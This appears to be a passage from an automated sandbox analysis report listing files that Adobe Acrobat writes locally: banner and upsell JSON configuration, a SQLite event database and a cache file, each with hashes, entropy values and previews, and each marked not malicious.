                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):294
                                                                              Entropy (8bit):5.328620680102745
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfBoTfXpnrPeUkwRe9:YvXKXht8DZc0vnvGWTfXcUkee9
                                                                              MD5:5264E939C8FFD2C956D2957F32DA4E69
                                                                              SHA1:B039269DEC76D074D93A9574EC10111FF94E9043
                                                                              SHA-256:429008B73B0FA62253340167FC9F0E2DCF6DF4373930D75F4BDC7F878744E5B3
                                                                              SHA-512:67A0607179BA51A66F3641E98FC6D401C5F2ED3182BB5D1ECE008DA54BCE229D508E9EE2F8F289D4D49D7739FFEC47B37F07631E4520129894D7AB7F48095F6A
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):294
                                                                              Entropy (8bit):5.3073268943296235
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfBD2G6UpnrPeUkwRe9:YvXKXht8DZc0vnvGR22cUkee9
                                                                              MD5:BA514A0ADF3267BBB0778AA2AE2C2023
                                                                              SHA1:E72259D9E2A3FEDE42634C9B7B3C47FAB01CBC60
                                                                              SHA-256:29E37DE3F39E8329726C91C08F473C189D4602DFCB72AC9819706754CEB073CE
                                                                              SHA-512:628D323E3467B44C58E5EEFC9901F0115091DCD6565A1ED0C479B63694A3A8E2CBB5A89455888271BC8425AF94933E97E5FFD1E75A83629358D7978DBBB8FB08
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):285
                                                                              Entropy (8bit):5.367523389482242
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfPmwrPeUkwRe9:YvXKXht8DZc0vnvGH56Ukee9
                                                                              MD5:6C98E8D0DA579DAECA54720772D6F25B
                                                                              SHA1:45E6FD67850FF5A222C758004B588D95ECE9F5DC
                                                                              SHA-256:F71412994C9B73EC41860D3963546F28AF937A9A14D24EB67F3B45E0F9246A0E
                                                                              SHA-512:DA263842B05FD33C0CB55E70A5C8C520039A40E6E9704C10AAF322B14F8BA47E29A292D9C7E6507BA93CE89B80065DBF7989E5CB72106E1C01A9DAA8EB896B12
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1123
                                                                              Entropy (8bit):5.69400188660464
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6XhmDzvn0pLgE9cQx8LennAvzBvkn0RCmK8czOCCSz:YvmmPP0hgy6SAFv5Ah8cv/z
                                                                              MD5:EA3537FE12F1DCCAD3C402795C4D7CB5
                                                                              SHA1:9C77F9C7C0C36ABFD1B76EDA7C5AC3625A041724
                                                                              SHA-256:EDBEA2AC8894E7871F1D97B6A1F6F348C73DAAFD3084A3242984E2C5249335DE
                                                                              SHA-512:A03C9CEC6F21E56F26CB5970E4CC39F0D135B51043F8EAFDD818DA1CFF2978998313DDA4FA36E1D73BA25A9B7876DA77EA3DFDB9D59D96278FF2CCA082E265C3
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):289
                                                                              Entropy (8bit):5.318138444740921
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJf8dPeUkwRe9:YvXKXht8DZc0vnvGU8Ukee9
                                                                              MD5:5C70AB7B3CC69EB3F758DD2BA68E7618
                                                                              SHA1:F5DBF976CEE4AD439B4C8AC90693E4185991C598
                                                                              SHA-256:C56214B08F7176E57E81D964329EC651BF6BE5D14A627A0D11357D127499DA8F
                                                                              SHA-512:C08F97B6EA5169675EAC7E8711560E22DCFA9953A889A6638D13E7E3C17CF0AF42B64DE773C048518597D38D964FCE4F9ED749E886BB896494BBFDE6B470C1D8
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):292
                                                                              Entropy (8bit):5.321834528494858
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfQ1rPeUkwRe9:YvXKXht8DZc0vnvGY16Ukee9
                                                                              MD5:57B78C54EB23578D35B3DD1E4EE2AC41
                                                                              SHA1:D6ADF19ADA55E093E17F11FA5594DDD7616F6302
                                                                              SHA-256:872B170B219357DB38D234CF22BFABE94D5105EC3B3EC91444EA40CF86469F9F
                                                                              SHA-512:3476B70BE19C406720776008CCED158C42AA0EFADAAE3C592594FB55F7186535989AF78B798B2D4EC70E52AA955DD1E6A094C12D8058F895E106B779DD055995
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):289
                                                                              Entropy (8bit):5.329208003233658
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfFldPeUkwRe9:YvXKXht8DZc0vnvGz8Ukee9
                                                                              MD5:8F3DC841FF7DF5FE97D4ACC0BACFC894
                                                                              SHA1:C2387B1DA64287F2DC1039335587EDF00DB3CF39
                                                                              SHA-256:0295BA81B3822E9CC6F33A3B01342A2FE79514DE4B7379C5035798338FBC8293
                                                                              SHA-512:FE5D8C23540D77ED5E86D1359EE851B9779DB4343776C9474842E973970A514443ECF41F840812806CE1D0D54C568DEBB5E01D67CCE8A42222CFF11D90787896
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):295
                                                                              Entropy (8bit):5.343374485739818
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfzdPeUkwRe9:YvXKXht8DZc0vnvGb8Ukee9
                                                                              MD5:C4667CD5B170FED740E9CD4B325777E0
                                                                              SHA1:99E39AE3EB2A4C33FF6F64EF19BF9561B03A9517
                                                                              SHA-256:4476DDF6EE8161F6AE822183AD971AF8AD31DE26B7498ED4B1DC5C85D541A74A
                                                                              SHA-512:1B181D05FB1EB8329B8F503265DE22C912335EE5B9E719B191673A2D54682ADF01867BC6282C1B9F3E976DCCC6C5EF532C3A317C946829D90137D68E6092AE2B
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):289
                                                                              Entropy (8bit):5.324222905902701
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfYdPeUkwRe9:YvXKXht8DZc0vnvGg8Ukee9
                                                                              MD5:CAF0CB1DB304F1D811CEFC4E4BDDEA19
                                                                              SHA1:DA6665D59E72764E3CDDEB5DB7348DE3EF66D8F0
                                                                              SHA-256:CEC90C63356DA9F5ED8330FB9B4C4EC65428DB866C63D25597D1E803E15D02A8
                                                                              SHA-512:D8A81AB022FC762391EC98E644EB0B12B732C26BAE7F56AE270A05CCF75A0CF33FA7A939135E65D3236E1DF36B1AE16720DC21312425D6261F1AD29F130407E4
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):284
                                                                              Entropy (8bit):5.310699738336536
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJf+dPeUkwRe9:YvXKXht8DZc0vnvG28Ukee9
                                                                              MD5:334C85C3B32821B656BF016080561459
                                                                              SHA1:642D679305A77E945B16F4F8DCF88F31FF8874B6
                                                                              SHA-256:B6DCB78EF4FBAA2F575B36569B0EB6B79FADF719565314F0105C6B1430D9CE99
                                                                              SHA-512:3EE08F680688354A98415A3198C26AA975CEFCA2C5A26367242693DD78C343826995B86757C5E660A25B7CC5ECA7AAD17C9C8D04B3E0730D842F7567932FA9FE
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):291
                                                                              Entropy (8bit):5.307603523123625
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfbPtdPeUkwRe9:YvXKXht8DZc0vnvGDV8Ukee9
                                                                              MD5:76C54E58F71671D02EE05ED1FBEA573D
                                                                              SHA1:EA27266374CD5A1BB9E291A43FD0B4F1C82187C2
                                                                              SHA-256:197379409A5BD488991C4D5FDBAD73D7C62D5E3A5622F1E92B6F792A21E89DA1
                                                                              SHA-512:FECE33D56F09A2F74F6B50EFF05B66E0D44360E84685359FB4153C1EE18C3444A900878FB2135946B5C2059983528833A71BC5471C90077C6804077ADC0E70CE
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):287
                                                                              Entropy (8bit):5.312275876339694
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJf21rPeUkwRe9:YvXKXht8DZc0vnvG+16Ukee9
                                                                              MD5:D0B7CDF392041BCD70B2CA9B7E2ACCF0
                                                                              SHA1:B3842CEB1CDCEE379601B235D27FE29FA3256F37
                                                                              SHA-256:5E99F679F048627FB861131BEDB8FD7B8B84EF92F0461E02E2416B8C80F953F8
                                                                              SHA-512:4E9119CC30C5294869B2CA3B457BC5CC8107FB7FE4A61F282A72E505D6925529C6DE608B4C020FF0C2B97EFB4170AD868D4922F5703406B725BF7E3350EBB47E
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1090
                                                                              Entropy (8bit):5.6699009621905665
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yv6XhmDzvnwamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSz:YvmmPP2BgkDMUJUAh8cvMz
                                                                              MD5:AD782A3F604CEB1CEF03E2199F001093
                                                                              SHA1:54CEED6819BFE5EB4C3FFDF30E6A495C2B2D38CD
                                                                              SHA-256:E5005C13CC5599F669619B533AA41F7A99FEFE92A701909ED8E2F89D54D658A0
                                                                              SHA-512:28919084D39AC8DFA52F9E6FC8CEC57A739A877C95601BB9C9A611B30FBA1B1F99615CCEB4AA83F3A5BEC3AC6F09F948B5FCFEC77C3EB642F6F41C3D2579EC44
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):286
                                                                              Entropy (8bit):5.290310275362236
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJfshHHrPeUkwRe9:YvXKXht8DZc0vnvGUUUkee9
                                                                              MD5:0A625E876C4F152AAC11E01B0CDC0358
                                                                              SHA1:4A4D61ABA6502AD3446E3A07035274DCFC824A73
                                                                              SHA-256:6250F98B8E102CCDF7189901778B0C24FEF9269575128550B325AFB1FA4E3E31
                                                                              SHA-512:8D22AAF67CB8283DDF03B4CD5368F32B113295EAA49BA6DCC2BDE3A185E082601A1B1B0E85BD8EBD55D96822810C803C2CAC8FA3BB14422A228AD4243512ED92
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):282
                                                                              Entropy (8bit):5.294015243600842
                                                                              Encrypted:false
                                                                              SSDEEP:6:YEQXJ2HXhbB8VkVoZcg1vRcR0YA0DoAvJTqgFCrPeUkwRe9:YvXKXht8DZc0vnvGTq16Ukee9
                                                                              MD5:5EC33066FD1404FCB813ACB3B775E4E7
                                                                              SHA1:D791CEBADC8C1F8A6831C5713FFC779C28ACFE0F
                                                                              SHA-256:87304086D8B8E123EBD613CCB7360C1985547E1133922D8F6088C3AEAD04C040
                                                                              SHA-512:CC0608536DB11A7373995F130D0E63F6D2322D0E3E5BD27588096103BB1271A1C4F8041F141B2B5CE916283D13872A75A67B45706737C43F2D70A133DCBD3BC7
                                                                              Malicious:false
                                                                              Preview:{"analyticsData":{"responseGUID":"f55f915b-c8ab-426f-8e95-2b14715ff020","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734731430609,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4
                                                                              Entropy (8bit):0.8112781244591328
                                                                              Encrypted:false
                                                                              SSDEEP:3:e:e
                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                              Malicious:false
                                                                              Preview:....

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):2814
                                                                              Entropy (8bit):5.127001091927312
                                                                              Encrypted:false
                                                                              SSDEEP:48:YfUt1jQDukoi8po8PSOfBCTGpmHYBXm/iGP9glesr:gUt1jQKkoNe86+CTSmHYojFglXr
                                                                              MD5:EE06D5E7603903C94BB552800D8198F7
                                                                              SHA1:DD95DA3A3B0FADA5E23C8A6E5E05C9A37754AE48
                                                                              SHA-256:B79927DB87A18B4A80A860C4125A0D5A0D782A1B3907FA3CD58CBC7ADEBF7188
                                                                              SHA-512:3E1C534288538785629648BD5F9C756581EBF6B764D6886ECC8B670402D302812C1D93EB021F4AA431204985D6207F41B4135DEBF457613727E5686F2B1DABE0
                                                                              Malicious:false
                                                                              Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"61a9ad5db54ea9925b61cbae05c56d0b","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734552030000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"bfdd1986ebdeb33abf1edcdf7b5c95d1","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734552030000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"b09e3590796d6237e4084fd19e76e0a1","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734552030000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"aac2d8e0662444f2b15ae9df2bb43cbd","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734552030000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"61477da23926cf6df172e63c9c1a6234","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734552030000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"e531d7c0d38eac84001df5d3182638c7","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                              Category:dropped
                                                                              Size (bytes):12288
                                                                              Entropy (8bit):1.1876795523328842
                                                                              Encrypted:false
                                                                              SSDEEP:48:TGufl2GL7msEHUUUUUUUUE2SvR9H9vxFGiDIAEkGVvpww:lNVmswUUUUUUUUD+FGSItb
                                                                              MD5:140DCF38E94D869B86758D6C06ABB600
                                                                              SHA1:02283836A081294B72ABF1B62491A1D868E482E1
                                                                              SHA-256:B613316707301FCFBBB3FE2D2EB721A379469265C2D419134A26E8A19569E73A
                                                                              SHA-512:9FF3356E047043D76873760F1FEABD0E6768B1B5A8304D26D437DDEDF2EF3AF00FF2F416B1A8D615CFAE9569CD533DEB143672C328AEDD62357D988972BA99D3
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:SQLite Rollback Journal
                                                                              Category:dropped
                                                                              Size (bytes):8720
                                                                              Entropy (8bit):1.6073791538163686
                                                                              Encrypted:false
                                                                              SSDEEP:48:7MRKUUUUUUUUUUEUvR9H9vxFGiDIAEkGVvJqFl2GL7ms67:7rUUUUUUUUUUfFGSIt7KVmsU
                                                                              MD5:5817BB77E5F718FF72F5AC3B5F8B7C78
                                                                              SHA1:FB9401A630E421B486C735ECAB0A3544AF6BE057
                                                                              SHA-256:93AA8DCD519CB232B1D6FFD77322604D1A6BE00A5222D4E9A97459F7F9994BDB
                                                                              SHA-512:9EE3CCD95C18346210BFA7009757493EFB24661FB87F90516CFF512E2BDBB0C31D1C8CAC65ABBAF20C0D09E69F05503B8A4A6FE96CC09FFA94B2439AE16C5B8C
                                                                              Malicious:false
                                                                              Preview:.... .c.....A.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                              Download File
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):66726
                                                                              Entropy (8bit):5.392739213842091
                                                                              Encrypted:false
                                                                              SSDEEP:768:RNOpblrU6TBH44ADKZEgMJ/v8krPRVkTUR1LohsT+J9Yyu:6a6TZ44ADEMhv8krPRTTG9K
                                                                              MD5:9AD63C10272CD9EB6A9CF63B45B67208
                                                                              SHA1:28098BCE17DF16D71758F7DA2CAA781A0C199DA3
                                                                              SHA-256:699D68F9F18166261F2B88B1A126C4E2D7D84922D1EEEBC917271EA56BAD0B58
                                                                              SHA-512:EC28C8C61B6B82E0F2C2E81589693FAB5CF94A5CA7ED250AE2174268930E5BF98975E1495431D669C9653FCEEB63088EE7CDCF95273A4F42F469615F5D5F9587
                                                                              Malicious:false
